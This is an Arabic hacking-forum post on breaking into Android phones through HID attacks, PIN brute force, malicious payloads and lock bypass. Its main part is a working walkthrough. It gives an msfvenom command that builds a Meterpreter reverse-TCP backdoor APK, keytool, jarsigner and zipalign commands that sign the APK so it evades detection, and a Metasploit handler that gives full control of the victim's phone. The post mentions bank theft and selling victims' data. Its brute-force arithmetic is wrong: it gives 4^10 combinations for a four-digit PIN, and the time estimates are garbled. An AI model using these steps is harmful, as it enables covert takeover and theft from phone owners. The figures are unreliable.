x32x01
  • بواسطة x32x01 ||
أختراق هواتف أندرويد HID (Human Interface Device) Attack
هو سيناريو يأخذ فيه المهاجم منصة تطوير مدمجة قابلة للبرمجة مثل حزمة البرامج المرتبطة مثل SET
(مجموعة أدوات الهندسة الاجتماعية) Metasploit وما إلى ذلك أو يستخدم الهواتف الأخرى و USB التي تمت برمجتها على كن RubberDucky ونفذ هجومًا.

في مثل هذا الهجوم يقوم المتسلل بتثبيت باب خلفي وباستخدامه يقوم بتنزيل معلومات الهدف بالكامل. يمكنه إما اختراق الحساب المصرفي للشخص أو حتى بيعه على شبكة الإنترنت المظلمة

استمع إلى هذه القصة
تتزايد الأساليب التي يستخدمها المهاجمون لاستغلال هواتف أندرويد. الناس مشغولون في العثور على نقاط ضعف جديدة لاستغلالها.

فيما يلي بعض الطرق لاختراق هواتف Android:
  • هجوم HID (جهاز واجهة بشرية)
  • كلمة المرور BruteForce
  • الحمولات (نصوص قرصنة مخصصة)
  • اعدادات المصنع تجاوز اختبأ
في مثل هذا الهجوم يقوم المتسلل بتثبيت باب خلفي وباستخدامه يقوم بتنزيل معلومات الهدف بالكامل.
باستخدام المعلومات يمكنه إما اختراق الحساب المصرفي للشخص أو حتى بيعه على شبكة الإنترنت.
تنفيذ هجوم hid من ملف android infosec قناة
تسجيل الدخول Bruteforce
يستخدم هجوم القوة الغاشمة طريقة التجربة والخطأ لتخمين كلمة المرور الصحيحة للهاتف.

بعض النقاط المهمة التي يجب مراعاتها لإجراء مثل هذا الهجوم:
عدد كلمات السر
المهلة
الوقت الذي قد يستغرقه
المهلة:
Code:
After 5 Wrong pin's - 30 sec delay
After 1 Wrong pin's - 30 sec delay
After 41 Wrong pin's - 30 sec delay

عدد كلمات المرور:
يمكن أن يبدأ العدد الإجمالي للمجموعات الممكنة لقفل رقمي مكون من 4 أرقام من 4 أصفار إلى 4 تسعات مما يعني 0000-9999 لذلك لدينا حوالي:
4^10 amount of password
or
1048576 passwords in total

الوقت مستهلك:
دعونا نرى بعض الاحتمالات لفهمنا:
احتمال # 1: 5 كلمات مرور خاطئة وتأخير 30 ثانية. نحتاج إلى معرفة عدد المرات التي حصلنا فيها على التأخير في المقام الأول وإيجاد إجمالي الوقت المستغرق.
Code:
total delay
1048576/5 = 209715.2 times
total time
209715.2 * 30 = 6291456 sec
or
1747.6266 hours

احتمال # 2 : 41 كلمة مرور خاطئة ، تأخير 30 ثانية.
Code:
total delays
1048576 / 41 = 25,575.0243 delays
total time consumed
25575.0243 * 30 = 7,67,250.729 sec
or
767250.729 / 60 = 12,787.5121 min
or
12,787.51215 hours

يمكنك أن ترى أنه يكاد يكون من المستحيل العثور على كلمة مرور هاتف الشخص بالقسر الغاشم. ستكون ميتًا بحلول الوقت الذي تعثر فيه على كلمة مرور الهاتف.

الحمولات :
- بقلم Hackerстивен
نصوص برمجية بسيطة تساعد المتسلل على اختراق النظام. الآن للسماح له بتثبيت ملف apk. والذي يفتح بابًا خلفيًا لـ Meterpreter للاستماع إلى اتصال لجعل النظام تحت سيطرته.
Code:
meterpreter reverse tcp payload creation command:
msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk
Payload is -p ، LHOST Localhost IP

لتلقي اتصال خلفي (تحقق من اتصالك بأمر if-config ) منفذ LPORT Localhost الذي يستمع فيه الاتصال للضحية (قمنا بتعيينه على 4444) تنسيق R Raw (نختار apk. ).

نحتاج إلى تقديم شهادة لملف .apk لمنحه هوية. نحتاج إلى توقيع شهادة لملف .apk لمنحه التعرف عليه كتطبيق. بدون ذلك ، سيتم التعرف على ملف .apk كفيروس.

لتعيين شهادة يجب عليك اتباع هذه الخطوات
تثبيت:
Keytool
موقع جرة
Zipalign
قم بتوقيع ملف .apk محليًا:
Code:
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Keytool صنع Keystore:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

توقيع ملف .apk مع JARsigner:
Code:
jarsigner -verify -verbose -certs android_shell.apk

تثبيت واستخدام Zipalign:
Code:
sudo apt-get install zipalign
or
sudo apt install zipalign
zipalign -v 4 android_shell.apk singed_jar.apk

الآن قم بتشغيل الأمر الخاص بذلك الموجود في وحدة التحكم Metasploit:
Code:
use exploit/multi/handler

وقم بتعيين المعلمات المختلفة في Metasploit مثل lhost ، lport ، إلخ. الآن تحتاج إلى تشغيل الأمر بعد ضبط نوع المضيف والمنفذ:
type:
Code:
run (and press enter)

بعد تنفيذ هذا الرمز ستتلقى اتصالاً بالنظام الهدف. باستخدام هذا ، يمكنك الوصول إلى النظام بأكمله والحصول على وصول كامل.

اعدادات المصنع
الهاتف الوامض هو جهاز تم فيه وميض ROM / نظام تشغيل مختلف أعلى النظام المرفق بالهاتف. في كثير من الأحيان يمكن وميض الهواتف لتبدو غير مقفلة ، بينما في الواقع ، لا تزال هواتف تحمل علامة تجارية لن تكون متوافقة مع خدمتنا.

لكل هاتف طرق مختلفة لإعادة ضبط المصنع وأكثرها شيوعًا هو القيام بذلك عبر أزرار الصوت وزر الطاقة. على سبيل المثال ، لدي هاتف oppo قديم حيث تكون تركيبة إعادة ضبط المصنع هي زر خفض الصوت وزر الطاقة ولمدة 5 ثوانٍ ويومض الهاتف.

تجاوز Bypass
هي طريقة شائعة الاستخدام من قبل سلطات إنفاذ القانون مثل CIA و FBI وفي الهند يستخدم IB و RAW جهازًا خاصًا .
في مثل هذا النوع من الهجوم يعتمد الأمر بشكل أساسي على المهاجم الذي يستخدم IP_BOX والذي يعمل بشكل أساسي على القوة الوحشية للهدف. يتم استخدام هذا بشكل أساسي من قبل سلطات إنفاذ القانون للوصول إلى هواتف مجرمي الإنترنت الإرهابيين وهواتف المجرمين الآخرين.

يمكنك استخدام أداة أخرى تعرف باسم BashBunny من hak5. هذا كمبيوتر صغير يمكنك من خلاله إجراء هجوم Bruteforce لتسجيل الدخول. على عكس الخيارات الأخرى المذكورة أعلاه يعد هذا وحشًا جادًا في عمله. في غضون ساعات يمكنك كسر أصعب كلمات المرور بسهولة.
 

المشاركات المتشابهة

x32x01
الردود
0
المشاهدات
3
x32x01
x32x01
x32x01
الردود
0
المشاهدات
11
x32x01
x32x01
x32x01
الردود
0
المشاهدات
17
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
30
x32x01
x32x01
x32x01
الردود
0
المشاهدات
49
x32x01
x32x01
الوسوم : الوسوم
android attack bruteforce hid metasploit أختراق الأندرويد أختراق هواتف الأندرويد

الدخول أو التسجيل السريع

نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى

المواضيع
1,530
المشاركات
1,716
أعضاء أكتب كود
191
أخر عضو
Ahmed123132
عودة
أعلى